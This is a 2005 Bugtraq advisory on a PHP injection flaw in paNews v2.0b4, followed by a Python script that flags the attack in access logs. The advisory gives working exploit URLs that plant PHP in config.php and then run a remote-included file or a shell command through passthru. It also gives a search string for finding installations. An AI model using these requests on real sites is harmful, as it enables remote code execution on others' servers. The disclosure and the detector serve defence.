paNews v2.0b4 - PHP Injection

From: tjomka (tjomka_at_navigator.lv)
Date: 02/21/05

    Date: Mon, 21 Feb 2005 07:13:30 +0200
    To: bugtraq@securityfocus.com
    
    
    

    ********************************
    **** Network security team *****
    ********* nst.e-nex.com ********
    ********************************
    * Title: paNews v2.0b4
    * Bug found by: тёмыч
    * Date: 20.02.2005
    ********************************

    web: http://www.phparena.net/panews.php
    google: allintitle:paNews v2.0b4

    PHP Injection
    The bug only works if:
    1. register_globals=On
    2. the includes directory is writable

    p.s. turn off JavaScript =-]

    Example 1

    http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)

    then:

    http://victim/panews/includes/config.php?nst=http://your/file.php

    Example 2

    http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)

    then:

    http://victim/panews/includes/config.php?nst=id
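
A defender can look for both stages of the requests shown above in web server access logs. The following is an added example, not part of the original post or of paNews: it assumes combined-format access logs, and the function names, finding labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that looks like PHP source: a "$variable" or a "name(" call.
PHP_CODE_RE = re.compile(r'\$[A-Za-z_]\w*|\b[A-Za-z_]\w*\s*\(')

def classify(line):
    """Return (label, parameter_names) for a suspicious log line, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    path = url.path.lower()
    params = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes
    if path.endswith("/includes/admin_setup.php") and "updatesets" in params.get("do", []):
        # Settings update sent straight to the include file; report the
        # parameters whose values look like PHP code.
        code = sorted(k for k, vs in params.items()
                      if any(PHP_CODE_RE.search(v) for v in vs))
        return ("config-write", code)
    if path.endswith("/includes/config.php") and params:
        # Assumption: a config file is only ever included by other scripts,
        # so a direct request carrying parameters is flagged.
        return ("config-request-with-params", sorted(params))
    return None

def scan(lines):
    """Return [(line_number, label, parameter_names)] for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        finding = classify(line)
        if finding:
            hits.append((n, *finding))
    return hits

# Constructed sample log (documentation IP ranges), not from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Feb/2005:07:20:01 +0200] "GET /panews/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [21/Feb/2005:07:21:13 +0200] "GET /panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&showcopy=passthru%28%24nst%29 HTTP/1.1" 200 312',
    '198.51.100.7 - - [21/Feb/2005:07:21:40 +0200] "GET /panews/includes/config.php?nst=id HTTP/1.1" 200 58',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A "config-write" hit followed by a "config-request-with-params" hit from the same client matches the two-step sequence in the examples; on an affected host, review the contents of includes/config.php as well.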

    
    


